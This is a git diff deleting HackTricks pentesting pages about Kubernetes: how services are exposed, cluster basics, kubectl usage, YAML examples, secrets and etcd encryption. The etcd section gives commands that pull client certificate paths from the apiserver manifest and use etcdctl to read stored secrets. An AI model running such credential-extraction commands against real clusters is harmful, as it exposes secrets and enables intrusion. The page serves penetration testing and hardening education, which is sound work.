- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md b/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md deleted file mode 100644 index a335dc1b8..000000000 --- a/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md +++ /dev/null @@ -1,212 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -There are **different ways to expose services** in Kubernetes so both **internal** endpoints and **external** endpoints can access them. This Kubernetes configuration is pretty critical as the administrator could give access to **attackers to services they shouldn't be able to access**. - -## Automatic Enumeration - -Before starting enumerating the ways K8s offers tot expose services to the public, know that if you can list namespaces, services and ingresses, you can everything exposed to the public with: - -```bash -kubectl get namespace -o custom-columns='NAME:.metadata.name' | grep -v NAME | while IFS='' read -r ns; do - echo "Namespace: $ns" - kubectl get service -n "$ns" - kubectl get ingress -n "$ns" - echo "==============================================" - echo "" - echo "" -done | grep -v "ClusterIP" -# Remove the last '| grep -v "ClusterIP"' to see also type ClusterIP -``` - -## ClusterIP - -A **ClusterIP** service is the **default** Kubernetes **service**. It gives you a **service inside** your cluster that other apps inside your cluster can access. There is **no external access**. - -However, this can be accessed using the Kubernetes Proxy: - -``` -kubectl proxy --port=8080 -``` - -Now, you can navigate through the Kubernetes API to access services using this scheme: - -`http://localhost:8080/api/v1/proxy/namespaces//services/:/` - -For example you could use the following URL: - -`http://localhost:8080/api/v1/proxy/namespaces/default/services/my-internal-service:http/` - -to access this service: - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-internal-service -spec: - selector: - app: my-app - type: ClusterIP - ports: - - name: http - port: 80 - targetPort: 80 - protocol: TCP -``` - -_This method requires you to run `kubectl` as an **authenticated user**._ - -## NodePort - -**NodePort opens a specific port on all the Nodes** (the VMs), and any **traffic** that is sent to this port is **forwarded to the service**. This is a really bad option usually. - -![](<../../.gitbook/assets/image (635) (1) (1).png>) - -An example of NodePort specification: - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-nodeport-service -spec: - selector: - app: my-app - type: NodePort - ports: - - name: http - port: 80 - targetPort: 80 - nodePort: 30036 - protocol: TCP -``` - -If you **don't specify** the **nodePort** in the yaml (it's the port that will be opened) a port in the **range 30000–32767 will be used**. - -## LoadBalancer - -Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service. - -![](<../../.gitbook/assets/image (654) (1) (1).png>) - -You have to pay for a LoadBalancer per exposed service, which can get expensive. - -## ExternalName - -Services of type ExternalName **map a Service to a DNS name**, not to a typical selector such as `my-service` or `cassandra`. You specify these Services with the `spec.externalName` parameter. - -This Service definition, for example, maps the `my-service` Service in the `prod` namespace to `my.database.example.com`: - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-service - namespace: prod -spec: - type: ExternalName - externalName: my.database.example.com -``` - -When looking up the host `my-service.prod.svc.cluster.local`, the cluster DNS Service returns a `CNAME` record with the value `my.database.example.com`. Accessing `my-service` works in the same way as other Services but with the crucial difference that **redirection happens at the DNS level** rather than via proxying or forwarding. - -## External IPs - -Traffic that ingresses into the cluster with the **external IP** (as **destination IP**), on the Service port, will be **routed to one of the Service endpoints**. `externalIPs` are not managed by Kubernetes and are the responsibility of the cluster administrator. - -In the Service spec, `externalIPs` can be specified along with any of the `ServiceTypes`. In the example below, "`my-service`" can be accessed by clients on "`80.11.12.10:80`" (`externalIP:port`) - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-service -spec: - selector: - app: MyApp - ports: - - name: http - protocol: TCP - port: 80 - targetPort: 9376 - externalIPs: - - 80.11.12.10 -``` - -## Ingress - -Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it sits i**n front of multiple services and act as a β€œsmart router”** or entrypoint into your cluster. - -You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**. - -![](<../../.gitbook/assets/image (653) (1).png>) - -The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service. - -The YAML for a Ingress object on GKE with a [L7 HTTP Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) might look like this: - -```yaml -apiVersion: extensions/v1beta1 -kind: Ingress -metadata: - name: my-ingress -spec: - backend: - serviceName: other - servicePort: 8080 - rules: - - host: foo.mydomain.com - http: - paths: - - backend: - serviceName: foo - servicePort: 8080 - - host: mydomain.com - http: - paths: - - path: /bar/* - backend: - serviceName: bar - servicePort: 8080 -``` - -## References - -* [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0) -* [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-basics.md b/pentesting/pentesting-kubernetes/kubernetes-basics.md deleted file mode 100644 index bf4e028ae..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-basics.md +++ /dev/null @@ -1,597 +0,0 @@ -# Kubernetes Basics - -## Kubernetes Basics - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)** - -## Architecture & Basics - -### What does Kubernetes do? - -* Allows running container/s in a container engine. -* Schedule allows containers mission efficient. -* Keep containers alive. -* Allows container communications. -* Allows deployment techniques. -* Handle volumes of information. - -### Architecture - -![](https://sickrov.github.io/media/Screenshot-68.jpg) - -* **Node**: operating system with pod or pods. - * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running. - * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\ - When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints` - -![](<../../.gitbook/assets/image (467).png>) - -* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes. -* **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors. -* **Sidecar container**: Sidecar containers are the containers that should run along with the main container in the pod. This sidecar pattern extends and enhances the functionality of current containers without changing them. Nowadays, We know that we use container technology to wrap all the dependencies for the application to run anywhere. A container does only one thing and does that thing very well. -* **Master process:** - * **Api Server:** Is the way the users and the pods use to communicate with the master process. Only authenticated request should be allowed. - * **Scheduler**: Scheduling refers to making sure that Pods are matched to Nodes so that Kubelet can run them. It has enough intelligence to decide which node has more available resources the assign the new pod to it. Note that the scheduler doesn't start new pods, it just communicate with the Kubelet process running inside the node, which will launch the new pod. - * **Kube Controller manager**: It checks resources like replica sets or deployments to check if, for example, the correct number of pods or nodes are running. In case a pod is missing, it will communicate with the scheduler to start a new one. It controls replication, tokens, and account services to the API. - * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...) -* **Cloud controller manager**: Is the specific controller for flow controls and applications, i.e: if you have clusters in AWS or OpenStack. - -Note that as the might be several nodes (running several pods), there might also be several master processes which their access to the Api server load balanced and their etcd synchronized. - -**Volumes:** - -When a pod creates data that shouldn't be lost when the pod disappear it should be stored in a physical volume. **Kubernetes allow to attach a volume to a pod to persist the data**. The volume can be in the local machine or in a **remote storage**. If you are running pods in different physical nodes you should use a remote storage so all the pods can access it. - -**Other configurations:** - -* **ConfigMap**: You can configure **URLs** to access services. The pod will obtain data from here to know how to communicate with the rest of the services (pods). Note that this is not the recommended place to save credentials! -* **Secret**: This is the place to **store secret data** like passwords, API keys... encoded in B64. The pod will be able to access this data to use the required credentials. -* **Deployments**: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods, pods are abstracted in **ReplicaSets** (number of same pods replicated), which are run via deployments. Note that deployments are for **stateless** applications. The minimum configuration for a deployment is the name and the image to run. -* **StatefulSet**: This component is meant specifically for applications like **databases** which needs to **access the same storage**. -* **Ingress**: This is the configuration that is use to **expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application. - * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services. - * A better security practice would be to use a cloud load balancer or a proxy server as entrypoint to don't have any part of the Kubernetes cluster exposed. - * When request that doesn't match any ingress rule is received, the ingress controller will direct it to the "**Default backend**". You can `describe` the ingress controller to get the address of this parameter. - * `minikube addons enable ingress` - -### PKI infrastructure - Certificate Authority CA: - -![](https://sickrov.github.io/media/Screenshot-66.jpg) - -* CA is the trusted root for all certificates inside the cluster. -* Allows components to validate to each other. -* All cluster certificates are signed by the CA. -* ETCd has its own certificate. -* types: - * apiserver cert. - * kubelet cert. - * scheduler cert. - -## Basic Actions - -### Minikube - -**Minikube** can be used to perform some **quick tests** on kubernetes without needing to deploy a whole kubernetes environment. It will run the **master and node processes in one machine**. Minikube will use virtualbox to run the node. See [**here how to install it**](https://minikube.sigs.k8s.io/docs/start/). - -``` -$ minikube start -πŸ˜„ minikube v1.19.0 on Ubuntu 20.04 -✨ Automatically selected the virtualbox driver. Other choices: none, ssh -πŸ’Ώ Downloading VM boot image ... - > minikube-v1.19.0.iso.sha256: 65 B / 65 B [-------------] 100.00% ? p/s 0s - > minikube-v1.19.0.iso: 244.49 MiB / 244.49 MiB 100.00% 1.78 MiB p/s 2m17. -πŸ‘ Starting control plane node minikube in cluster minikube -πŸ’Ύ Downloading Kubernetes v1.20.2 preload ... - > preloaded-images-k8s-v10-v1...: 491.71 MiB / 491.71 MiB 100.00% 2.59 MiB -πŸ”₯ Creating virtualbox VM (CPUs=2, Memory=3900MB, Disk=20000MB) ... -🐳 Preparing Kubernetes v1.20.2 on Docker 20.10.4 ... - β–ͺ Generating certificates and keys ... - β–ͺ Booting up control plane ... - β–ͺ Configuring RBAC rules ... -πŸ”Ž Verifying Kubernetes components... - β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 -🌟 Enabled addons: storage-provisioner, default-storageclass -πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by defaul - -$ minikube status -host: Running -kubelet: Running -apiserver: Running -kubeconfig: Configured - ----- ONCE YOU HAVE A K8 SERVICE RUNNING WITH AN EXTERNAL SERVICE ----- -$ minikube service mongo-express-service -(This will open your browser to access the service exposed port) - -$ minikube delete -πŸ”₯ Deleting "minikube" in virtualbox ... -πŸ’€ Removed all traces of the "minikube" cluster -``` - -### Kubectl Basics - -**`Kubectl`** is the command line tool fro kubernetes clusters. It communicates with the Api server of the master process to perform actions in kubernetes or to ask for data. - -```bash -kubectl version #Get client and server version -kubectl get pod -kubectl get services -kubectl get deployment -kubectl get replicaset -kubectl get secret -kubectl get all -kubectl get ingress -kubectl get endpoints - -#kubectl create deployment --image= -kubectl create deployment nginx-deployment --image=nginx -#Access the configuration of the deployment and modify it -#kubectl edit deployment -kubectl edit deployment nginx-deployment -#Get the logs of the pod for debbugging (the output of the docker container running) -#kubectl logs -kubectl logs nginx-deployment-84cd76b964 -#kubectl describe pod -kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q -#kubectl exec -it -- bash -kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash -#kubectl describe service -kubectl describe service mongodb-service -#kubectl delete deployment -kubectl delete deployment mongo-depl -#Deploy from config file -kubectl apply -f deployment.yml -``` - -### Minikube Dashboard - -The dashboard allows you to see easier what is minikube running, you can find the URL to access it in: - -``` -minikube dashboard --url - - -πŸ”Œ Enabling dashboard ... - β–ͺ Using image kubernetesui/dashboard:v2.3.1 - β–ͺ Using image kubernetesui/metrics-scraper:v1.0.7 -πŸ€” Verifying dashboard health ... -πŸš€ Launching proxy ... -πŸ€” Verifying proxy health ... -http://127.0.0.1:50034/api/v1/namespaces/kubernetes-dashboard/services/http:kubernetes-dashboard:/proxy/ -``` - -### YAML configuration files examples - -Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\ -Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run: - -![](<../../.gitbook/assets/image (458) (1) (1) (1).png>) - -**Example of Deployment + Service declared in the same configuration file (from** [**here**](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)**)** - -As a service usually is related to one deployment it's possible to declare both in the same configuration file (the service declared in this config is only accessible internally): - -```yaml -apiVersion: apps/v1 -kind: Deployment -metadata: - name: mongodb-deployment - labels: - app: mongodb -spec: - replicas: 1 - selector: - matchLabels: - app: mongodb - template: - metadata: - labels: - app: mongodb - spec: - containers: - - name: mongodb - image: mongo - ports: - - containerPort: 27017 - env: - - name: MONGO_INITDB_ROOT_USERNAME - valueFrom: - secretKeyRef: - name: mongodb-secret - key: mongo-root-username - - name: MONGO_INITDB_ROOT_PASSWORD - valueFrom: - secretKeyRef: - name: mongodb-secret - key: mongo-root-password ---- -apiVersion: v1 -kind: Service -metadata: - name: mongodb-service -spec: - selector: - app: mongodb - ports: - - protocol: TCP - port: 27017 - targetPort: 27017 -``` - -**Example of external service config** - -This service will be accessible externally (check the `nodePort` and `type: LoadBlancer` attributes): - -```yaml ---- -apiVersion: v1 -kind: Service -metadata: - name: mongo-express-service -spec: - selector: - app: mongo-express - type: LoadBalancer - ports: - - protocol: TCP - port: 8081 - targetPort: 8081 - nodePort: 30000 -``` - -{% hint style="info" %} -This is useful for testing but for production you should have only internal services and an Ingress to expose the application. -{% endhint %} - -**Example of Ingress config file** - -This will expose the application in `http://dashboard.com`. - -```yaml -apiVersion: networking.k8s.io/v1 -kind: Ingress -metadata: - name: dashboard-ingress - namespace: kubernetes-dashboard -spec: - rules: - - host: dashboard.com - http: - paths: - - backend: - serviceName: kubernetes-dashboard - servicePort: 80 -``` - -**Example of secrets config file** - -Note how the password are encoded in B64 (which isn't secure!) - -```yaml -apiVersion: v1 -kind: Secret -metadata: - name: mongodb-secret -type: Opaque -data: - mongo-root-username: dXNlcm5hbWU= - mongo-root-password: cGFzc3dvcmQ= -``` - -**Example of ConfigMap** - -A **ConfigMap** is the configuration that is given to the pods so they know how to locate and access other services. In this case, each pod will know that the name `mongodb-service` is the address of a pod that they can communicate with (this pod will be executing a mongodb): - -```yaml -apiVersion: v1 -kind: ConfigMap -metadata: - name: mongodb-configmap -data: - database_url: mongodb-service -``` - -Then, inside a **deployment config** this address can be specified in the following way so it's loaded inside the env of the pod: - -```yaml -[...] -spec: - [...] - template: - [...] - spec: - containers: - - name: mongo-express - image: mongo-express - ports: - - containerPort: 8081 - env: - - name: ME_CONFIG_MONGODB_SERVER - valueFrom: - configMapKeyRef: - name: mongodb-configmap - key: database_url -[...] -``` - -**Example of volume config** - -You can find different example of storage configuration yaml files in [https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes](https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes).\ -**Note that volumes aren't inside namespaces** - -### Namespaces - -Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. These are intended for use in environments with many users spread across multiple teams, or projects. For clusters with a few to tens of users, you should not need to create or think about namespaces at all. You only should start using namespaces to have a better control and organization of each part of the application deployed in kubernetes. - -Namespaces provide a scope for names. Names of resources need to be unique within a namespace, but not across namespaces. Namespaces cannot be nested inside one another and **each** Kubernetes **resource** can only be **in** **one** **namespace**. - -There are 4 namespaces by default if you are using minikube: - -``` -kubectl get namespace -NAME STATUS AGE -default Active 1d -kube-node-lease Active 1d -kube-public Active 1d -kube-system Active 1d -``` - -* **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes. -* **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information -* **kube-node-lease**: Determines the availability of a node -* **default**: The namespace the user will use to create resources - -```bash -#Create namespace -kubectl create namespace my-namespace -``` - -{% hint style="info" %} -Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace: - -```bash -kubectl api-resources --namespaced=true #In a namespace -kubectl api-resources --namespaced=false #Not in a namespace -``` -{% endhint %} - -You can save the namespace for all subsequent kubectl commands in that context. - -```bash -kubectl config set-context --current --namespace= -``` - -### Helm - -Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. - -``` -helm search -``` - -Helm is also a template engine that allows to generate config files with variables: - -![](<../../.gitbook/assets/image (465) (1).png>) - -## Kubernetes secrets - -A **Secret** is an object that **contains sensitive data** such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**. Read here [the official documentation](https://kubernetes.io/docs/concepts/configuration/secret/). - -Secrets might be things like: - -* API, SSH Keys. -* OAuth tokens. -* Credentials, Passwords (plain text or b64 + encryption). -* Information or comments. -* Database connection code, strings… . - -There are different types of secrets in Kubernetes - -| Builtin Type | Usage | -| ----------------------------------- | ----------------------------------------- | -| **Opaque** | **arbitrary user-defined data (Default)** | -| kubernetes.io/service-account-token | service account token | -| kubernetes.io/dockercfg | serialized \~/.dockercfg file | -| kubernetes.io/dockerconfigjson | serialized \~/.docker/config.json file | -| kubernetes.io/basic-auth | credentials for basic authentication | -| kubernetes.io/ssh-auth | credentials for SSH authentication | -| kubernetes.io/tls | data for a TLS client or server | -| bootstrap.kubernetes.io/token | bootstrap token data | - -{% hint style="info" %} -**The Opaque type is the default one, the typical key-value pair defined by users.** -{% endhint %} - -**How secrets works:** - -![](https://sickrov.github.io/media/Screenshot-164.jpg) - -The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME` \_\_ and \_\_ `SECRET_PASSWOR`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions. - -{% code title="secretpod.yaml" %} -```yaml -apiVersion: v1 -kind: Secret -metadata: - name: mysecret -type: Opaque -data: - username: YWRtaW4= - password: MWYyZDFlMmU2N2Rm ---- -apiVersion: v1 -kind: Pod -metadata: - name: secretpod -spec: - containers: - - name: secretpod - image: nginx - env: - - name: SECRET_USERNAME - valueFrom: - secretKeyRef: - name: mysecret - key: username - - name: SECRET_PASSWORD - valueFrom: - secretKeyRef: - name: mysecret - key: password - volumeMounts: - - name: foo - mountPath: "/etc/foo" - restartPolicy: Never - volumes: - - name: foo - secret: - secretName: mysecret - items: - - key: username - path: my-group/my-username - mode: 0640 -``` -{% endcode %} - -```bash -kubectl apply -f -kubectl get pods #Wait until the pod secretpod is running -kubectl exec -it secretpod -- bash -env | grep SECRET && cat /etc/foo/my-group/my-username && echo -``` - -### Secrets in etcd - -**etcd** is a consistent and highly-available **key-value store** used as Kubernetes backing store for all cluster data. Let’s access to the secrets stored in etcd: - -```bash -cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep etcd -``` - -You will see certs, keys and url’s were are located in the FS. Once you get it, you would be able to connect to etcd. - -```bash -#ETCDCTL_API=3 etcdctl --cert --key --cacert endpoint=[] health - -ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] health -``` - -Once you achieve establish communication you would be able to get the secrets: - -```bash -#ETCDCTL_API=3 etcdctl --cert --key --cacert endpoint=[] get - -ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] get /registry/secrets/default/secret_02 -``` - -**Adding encryption to the ETCD** - -By default all the secrets are **stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/) - -{% code title="encryption.yaml" %} -```yaml -apiVersion: apiserver.config.k8s.io/v1 -kind: EncryptionConfiguration -resources: - - resources: - - secrets - providers: - - aescbc: - keys: - - name: key1 - secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= #Any random key - - identity: {} -``` -{% endcode %} - -After that, you need to set the `--encryption-provider-config` flag on the `kube-apiserver` to point to the location of the created config file. You can modify `/etc/kubernetes/manifest/kube-apiserver.yaml` and add the following lines: - -```yaml - containers: - - command: - - kube-apiserver - - --encriyption-provider-config=/etc/kubernetes/etcd/ -``` - -Scroll down in the volumeMounts: - -```yaml -- mountPath: /etc/kubernetes/etcd - name: etcd - readOnly: true -``` - -Scroll down in the volumeMounts to hostPath: - -```yaml -- hostPath: - path: /etc/kubernetes/etcd - type: DirectoryOrCreate - name: etcd -``` - -**Verifying that data is encrypted** - -Data is encrypted when written to etcd. After restarting your `kube-apiserver`, any newly created or updated secret should be encrypted when stored. To check, you can use the `etcdctl` command line program to retrieve the contents of your secret. - -1. Create a new secret called `secret1` in the `default` namespace: - - ``` - kubectl create secret generic secret1 -n default --from-literal=mykey=mydata - ``` -2. Using the etcdctl commandline, read that secret out of etcd: - - `ETCDCTL_API=3 etcdctl get /registry/secrets/default/secret1 [...] | hexdump -C` - - where `[...]` must be the additional arguments for connecting to the etcd server. -3. Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data. -4. Verify the secret is correctly decrypted when retrieved via the API: - - ``` - kubectl describe secret secret1 -n default - ``` - - should match `mykey: bXlkYXRh`, mydata is encoded, check [decoding a secret](https://kubernetes.io/docs/concepts/configuration/secret#decoding-a-secret) to completely decode the secret. - -**Since secrets are encrypted on write, performing an update on a secret will encrypt that content:** - -``` -kubectl get secrets --all-namespaces -o json | kubectl replace -f - -``` - -**Final tips:** - -* Try not to keep secrets in the FS, get them from other places. -* Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets. -* [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks) -* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm) - -## References - -{% embed url="https://sickrov.github.io/" %} - -{% embed url="https://www.youtube.com/watch?v=X48VuDVv0do" %} - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md deleted file mode 100644 index cbdc9e49b..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md +++ /dev/null @@ -1,171 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
